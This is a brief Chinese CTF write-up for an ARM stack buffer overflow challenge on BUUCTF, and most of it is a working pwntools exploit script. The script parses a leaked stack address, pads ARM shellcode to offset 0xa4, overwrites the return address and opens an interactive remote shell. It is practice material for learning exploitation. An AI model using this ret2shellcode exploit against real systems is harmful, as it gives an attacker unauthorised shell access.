root_me_stack_buffer_overflow_basic

ARM pwn简单的栈溢出,就是环境搭建的问题
调试出偏移0xa4,发现啥保护没有开,还泄漏了栈地址,就直接ret2shellcode了

from pwn import *
#p=process(qemu-arm -g 1234 -L /usr/arm-linux-gnueabihf/ ./root_me_stack_buffer_overflow_basiac"])
p=remote("node3.buuoj.cn",27876)
p.sendlineafter('Give me data to dump:','a')
stack=int(p.recvuntil(': ',drop=True)[-10:],16)
log.success('stack: '+hex(stack))
context.arch='arm'
shellcode=asm(shellcraft.arm.linux.sh())
p.sendlineafter('Dump again (y/n):','y')
payload=shellcode.ljust(0xa4,'a')+p32(stack)
payload=payload.ljust(300,'b')
p.sendlineafter('Give me data to dump:',payload)
p.interactive()

你可能感兴趣的:(BUUCTF,题目)